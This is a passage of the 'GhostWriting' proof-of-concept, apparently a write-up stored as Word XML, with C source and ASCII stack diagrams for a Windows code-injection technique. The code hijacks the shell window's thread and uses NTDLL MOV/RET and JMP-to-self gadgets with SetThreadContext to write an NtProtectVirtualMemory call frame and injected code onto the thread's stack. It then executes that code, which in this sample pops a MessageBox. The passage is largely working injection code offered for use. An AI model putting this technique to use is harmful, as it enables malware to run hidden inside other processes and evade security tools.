    <w:p w14:paraId="1B81360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                                           |  ( POP REGx / ADD REGx,yy )            |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4702338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                                           |  .                                     |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7FE0D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                                           |  .                                     |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E087C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                                           |  RET / RET n                           |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC656B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                                           |________________________________________|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FA119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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29807BA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 |        |           |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4115AF2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                                                     SOMEWHERE INTO NTDLL.DLL's CODE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77ED6F6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|           |                                                     _______________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD8263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`---------------------------------------------------------------&gt;|                               |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013E539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         |  JMP $                        |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F18777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         |_______________________________|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AC7E0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0C6CB24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40FF594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1F10E7B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66951E2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Initial ESP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B3C35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6859F1B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5D9BD9A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3EF974B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02FE9DC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7CF73E8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342657C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3E012CA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4E1ADC9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778D18C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|____________________|&lt;--- Stack Top</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFC12D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336B6A5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3ADB7A4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0EEB42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DWORDWritingPointer=BASEOfWrittenBytes+NumberOfBytesToPopAfterMOVBeforeRET+sizeof(DWORD);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30815AF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D8C5F3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for(i=0;i&lt;9;i++)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2CDF5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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D813F9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WorkingThreadContext.Esp=BASEOfWrittenBytes;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62721B3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*WritePointer=DWORDWritingPointer-MOVRETOffsetFromMemoryRegister;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E89E04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*WriteItem=NtProtectVirtualMemoryCallFrame[i];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6D9D1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WorkingThreadContext.Eip=MOVRETAddress;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3170D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5C4073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WaitForThreadAutoLock(Thread,&amp;WorkingThreadContext,ThreadsWindow,JMPTOSELFAddress);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C55612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27E154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DWORDWritingPointer+=sizeof(DWORD);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A02158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4D01081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3B9FC2E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 After this for executes, we have the NtProtectVirtualMemory call frame written to the hijacked thread's stack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B04F76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0893077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0B919E1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STACK STATUS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C69E37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____________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35483EA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Stack Bottom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9827D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7B3E470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1F37365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242CE2B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6901DC3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076A3F7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BASEOfWrittenBytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12117A0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a            |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4382D7B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b            |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9AC01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.                  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C894D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.                  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E03BFF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z            |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E782B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1C8DFA6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JMPTOSELFAddress -------------------.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCCE29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                |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081CACA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SIMULATED RETADDR  |&lt;--- ESP        |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F17F2D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p.1: ProcessHandle |                |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CCAF3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p.2: &amp;BaseAddress -----------.      |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6BEF1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p.3: &amp;NumBytesProt --------. |      |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C0DC3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p.4: NewAccessProt |       | |      |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCDEC8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p.5: &amp;OldAccessPrt ----.   | |      |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F88F4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BaseAddress --.    |&lt;--+---+-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|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9D572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NumBytesProt  |    |&lt;--+---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  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0225748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OldAccessPrt  |    |&lt;--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      |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F2F33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|-------------- v ---|                |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106A79D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5FD07E6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5C8EEF3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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727C061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                                    SOMEWHERE INTO NTDLL.DLL's CODE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B029CE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                                    _______________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4985F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|      EIP == JMPTOSELFAddress ---&gt;\|                               |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A4EB8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`---------------------------------&gt;/|  JMP $                        |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EBBC7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         |_______________________________|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A9B37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6155AED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2F21888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347FB11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21BA41A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Initial ESP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0174C21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7747995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10D2916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7920BF8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7861B20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56F8AC8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1CFEE6F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79EEA51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5340084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|____________________|&lt;--- Stack Top</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8B143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24935C3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4444B85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NOTE: One could say that that return address ( JMPTOSELFAddress ) is put twice and that we could have optimized this by not writing it again,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5FC03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  it's true. However, I preferred to isolate this call frame from the previous stack stuff in order to make it more clear and also more</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435DA7B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     generic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF7F7F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5F17CF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Ok, so we have set up that call frame for later usage, we could run that call to NtProtectVirtualMemory now, but, for the sake of clearness,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C53609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let's make the writings first and let the executions for the ending part. So let's write our last bytes, the injection executable bytes. See</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55ADC41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how DWORDWritingPointer points just ahead of the previously written call frame, so we do not need to calculate it again, it actually points</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06499A6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where it needs to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B428C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2A8DDE5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We save current DWORDWritingPointer's value in order to set thread's EIP to that value later on ( in injection execution phase ).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F98A83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InjectedCodeExecutionStart=DWORDWritingPointer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E795D2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0F79CF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Here we write executable code bytes, DWORD by DWORD, into thread's stack space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464CF2D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110BFBE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STACK STATUS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CC1E7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____________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BAA37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Stack Bottom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1EB27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73B1B16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02EFE0B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478D732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188847E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3F3AA55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,ESP == BASEOfWrittenBytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E58DD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a            |   ,-| +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8024E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b            |   | `NumberOfBytesToPopAfterMOVBeforeRET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B14DF6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.                  |   |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACA52D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.                  |   |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED8202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 | dummy z            |   |                                                         ( for i from 0 to NumberOfDWORDsToInject )---.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245728A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   |                                                                                                      |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC055E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JMPTORETAddress    |&lt;--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                                                      *WriteItem ( REG2 ) == InjectionCode[i] &lt;-|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AB7B3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 __________________|                 ,MOVRETOffsetFromMemoryRegister                                                          |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A1FA9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||SIMULATED RETADDR  |               ,-| -                                                                                      |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2516589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||p.1: ProcessHandle |               | `*WritePointer ( REG1 ) == DWORDWritingPointer+i*4 &lt;-------------------------------------</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB01D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>�</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6550FFA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||p.2: &amp;BaseAddress -----------.     |                            SOMEWHERE INTO NTDLL.DLL's CODE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6D8ED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||p.3: &amp;NumBytesProt --------. |     |                            ________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590E167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||p.4: NewAccessProt |       | |     |  EIP == MOVRETAddress ---&gt;|                                        |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C80A1D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||p.5: &amp;OldAccessPrt ----.   | |     |                           |  MOV [REG1],REG2 / MOV [REG1+xx],REG2  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCD309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||BaseAddress --.    |&lt;--+---+-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|                           |  ( POP REGx / ADD REGx,yy )            |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CEAE6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||NumBytesProt  |    |&lt;--+---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 |                           |  .                                     |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B05AE8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||OldAccessPrt  |    |&lt;--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     |                           |  .                                     |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1405A70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 ------------ v ---|               |                           |  RET / RET n                           |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E632B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                   |&lt;--------------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                     |________________________________________|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1533F7D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                   | .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B79B6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                   | .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD2271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                   | .                                                   SOMEWHERE INTO NTDLL.DLL's CODE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C31B72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||                   |                                                     _______________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4C364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|`-----------------------------------------------------------------------&gt;|                               |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CBE76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         |  JMP $                        |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717A87C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                                                    |_______________________________|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B6EFA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79157D5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4877377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2098CD6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210C4F6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Initial ESP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704E95E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11D9B25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679A500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25FDC3E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13519C8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3CEEF3E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360FF7B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1D9E87D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65CEEA1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4DF79F7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|____________________|&lt;--- Stack Top</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAE798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5378A78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56BEBE9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EA20EE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for(i=0;i&lt;NumberOfDWORDsToInject;i++)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A21A2C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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576EB2C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WorkingThreadContext.Esp=BASEOfWrittenBytes;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCDCAF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*WritePointer=DWORDWritingPointer-MOVRETOffsetFromMemoryRegister;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEF7E6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*WriteItem=InjectionCode[i];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D1231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WorkingThreadContext.Eip=MOVRETAddress;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3CE66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45EDEB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WaitForThreadAutoLock(Thread,&amp;WorkingThreadContext,ThreadsWindow,JMPTOSELFAddress);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56931D9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4E4425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DWORDWritingPointer+=sizeof(DWORD);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D2CF5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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69680E9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805CC7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So, after this code injection writing loop, we have achieved this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7180ED5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7A1EA1E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0435559D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STACK STATUS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D221AE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 ____________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706F434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Stack Bottom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77758E9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73EC9B9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571A9EA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3344D3D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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7280C0C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5070063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BASEOfWrittenBytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74ABD5F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a            |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3CE22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b            |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBC3E6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.                  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B26EE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.                  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D554EF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dummy z            |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC3124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62A1F33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JMPTOSELFAddress -------------------.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FC0CF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                |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558B7D2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SIMULATED RETADDR  |&lt;--- ESP        |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634E592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p.1: ProcessHandle |                |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBF084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p.2: &amp;BaseAddress -----------.      |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAD873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p.3: &amp;NumBytesProt --------. |      |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12288F9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>// | p.4: NewAccessProt |       | |      |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3919421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p.5: &amp;OldAccessPrt ----.   | |      |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1909229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BaseAddress --.    |&lt;--+---+-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|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E815B4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NumBytesProt  |    |&lt;--+---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  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13971A1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OldAccessPrt  |    |&lt;--</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB01D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>�</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB01D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">            |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CFDA4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|-------------- v ---|                |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF51F4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EXECUTABLE CODE    |                |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBC84B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EXECUTABLE CODE    |                |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173CF9C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EXECUTABLE CODE    |                |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1946830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EXECUTABLE CODE    |                |                                    SOMEWHERE INTO NTDLL.DLL's CODE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411DB7E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EXECUTABLE CODE    |                |                                    _______________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C24E54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EXECUTABLE CODE    |                |      EIP == JMPTOSELFAddress ---&gt;\|                               |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7C656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EXECUTABLE CODE    |                `---------------------------------&gt;/|  JMP $                        |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254BECE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EXECUTABLE CODE    |                                                    |_______________________________|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCB24E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EXECUTABLE CODE    |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48531EA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EXECUTABLE CODE    |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CC1F8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EXECUTABLE CODE    |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE2214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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A22C90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                  |&lt;--- Initial ESP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2387DD0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2E371F3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13B4B03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15D8C27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37A80CB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44FCB40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2D9256F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621E277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  USED STACK SPACE  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DC670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|____________________|&lt;--- Stack Top</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576A5CB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267420D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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501CA6B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63435F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Ok, all the needed stuff has been written to the hijacked stack. As we said before, first we write, then we execute. All written, let's run !</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C07E24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580C6F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We will first run the NtProtectVirtualMemory with our written, simulated call frame:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185EA1C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WorkingThreadContext.Esp=BASEOfWrittenBytes+NumberOfBytesToPopAfterMOVBeforeRET+sizeof(DWORD);    // We make thread's ESP point into the call frame</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01719FF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WorkingThreadContext.Eip=NtProtectVirtualMemoryAddress;    // and set thread's EIP point to the address of that API into NTDLL.DLLs code. This two</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F12C1E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</w:r>
      <w:r w:rsidRPr="00DB01D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// changes simulate the call. I hope you will understand it yourself this time  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA5F92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3354865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WaitForThreadAutoLock(Thread,&amp;WorkingThreadContext,ThreadsWindow,JMPTOSELFAddress);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB1A4E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60FCC5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// And finally, the moment we have all been waiting for.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3720108F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WorkingThreadContext.Esp=BASEOfWrittenBytes;    // set ESP to a "safe" place</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642812B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WorkingThreadContext.Esi=JMPTOSELFAddress;    // injected code expects ESI to be its "EXIT ADDRESS" ( see InjectionCode array declaration )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7061FAD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WorkingThreadContext.Ebx=BASEOfWrittenBytes;    // injected code also expects EBX to be its "Delta Handle" or memory base address of its own</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E13BE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 xml:space="preserve">WorkingThreadContext.Eip=InjectedCodeExecutionStart;    // set EIP to the base address where the injected executable code starts  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C434D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22BAB7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WaitForThreadAutoLock(Thread,&amp;WorkingThreadContext,ThreadsWindow,JMPTOSELFAddress);    // and... RUN !!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305DD72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B132A9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 xml:space="preserve">// alllllll donnneee ! let's let hijacked thread loose so it enjoys is silly life again </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB01D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>��</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB01D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4954AFC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SetThreadContext(Thread,&amp;SavedThreadContext);    // restore initial thread's original state and restore it...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E83A7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ResumeThread(Thread);    // and resume its execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7818950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621A935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PostMessage(ThreadsWindow,WM_USER,0,0);    // Just in case, send a message to awake its wait...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30939AC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29A53E7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 xml:space="preserve">return TRUE;    // all went fine  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4359952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EBC993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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044DCF5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 xml:space="preserve">else    // else, we did not found those two patterns </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3817C44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return FALSE;    // so we return with error...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D092F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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A2945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6210D6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void main(void)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0BB2F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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DE388C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HWND ShellWindowHandle;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2C4C5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DWORD ShellWindowThread;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A78AA34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lastRenderedPageBreak/>
        <w:tab/>
        <w:t>HANDLE VictimThreadHandle;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22263A2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2F91928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We solve MessageBoxA APIs address...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB027C0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HMODULE USER32Base=LoadLibrary("USER32.DLL");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F1EC9B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DWORD MessageBoxAAddress=(DWORD)GetProcAddress(USER32Base,"MessageBoxA");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0ED9E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FreeLibrary(USER32Base);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C9C2A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53DCE7E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*(DWORD*)(&amp;InjectionCode[58])=MessageBoxAAddress;    // And we put that address into InjectionCode ( see InjectionCode array declaration )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F27B6B3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1198E5B2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// We get our victim thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B08A0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ShellWindowHandle=GetShellWindow();    // by first getting a handle of a window it owns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CABD009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ShellWindowThread=GetWindowThreadProcessId(ShellWindowHandle,NULL);    // and then getting the owning thread ID of that window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4658CA87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575E6E0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VictimThreadHandle=OpenThread(THREAD_SET_CONTEXT|THREAD_GET_CONTEXT|THREAD_SUSPEND_RESUME,FALSE,ShellWindowThread);    // We open victim thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB05D0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74EDEF3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 xml:space="preserve">// And we try our injection technique over it </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FF2616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if (Inject(VictimThreadHandle,InjectionCode,(sizeof(InjectionCode)+4)/4,ShellWindowHandle))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656505A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MessageBox(NULL,"SUCCESS ! ;D","GhostWriting: Proof Of Concept",0);    // Yay !</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F972545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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147DB21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</w:r>
      <w:r w:rsidRPr="00DB01D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>MessageBox(NULL,"FAILURE !  ","GhostWriting: Proof Of Concept",0);    // Ouch :S</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3525F718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</w:p>
    <w:p w14:paraId="0C852C4A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ab/>
        <w:t>CloseHandle(VictimThreadHandle);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C00BAD1" w14:textId="77777777" w:rsidR="00D95A70" w:rsidRPr="00DB01D3" w:rsidRDefault="00D95A70" w:rsidP="00DB01D3">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB01D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00000000" w:rsidRPr="00DB01D3" w:rsidSect="00DB01D3">
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1440" w:right="2675" w:bottom="1440" w:left="26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altName w:val="Arial Narrow"/>
    <w:panose1 w:val="020B0609020204030204"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:notTrueType/>
    <w:pitch w:val="default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D3"/>
    <w:rsid w:val="00004DD9"/>
    <w:rsid w:val="00D95A70"/>
    <w:rsid w:val="00DB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9A82A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5E00D40D-A5A1-6344-A1C4-FB323B75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B01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01D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7584</Words>
  <Characters>43231</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>360</Lines>
  <Paragraphs>101</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>50714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2025-11-27T12:16:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-27T12:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>